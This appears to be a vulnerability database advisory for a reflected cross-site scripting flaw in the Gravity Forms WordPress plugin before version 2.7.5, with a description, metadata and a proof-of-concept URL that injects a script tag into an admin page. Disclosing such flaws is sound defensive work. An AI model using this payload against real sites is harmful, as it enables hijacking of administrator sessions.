WordPress Plugin Vulnerabilities
Gravity Forms < 2.7.5 - Reflected XSS
Description
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high-privileged users such as admin.
Proof of Concept
Make a logged in admin open the following URL: https://examle.com/wp-admin/admin.php?page=gf_edit_forms&s=vulnerable&"><script>alert(/XSS/)</script>=2
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Fioravante Souza (WPScan)
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-21 (about 5 months ago)
Added
2023-06-21 (about 5 months ago)
Last Updated
2023-06-21 (about 5 months ago)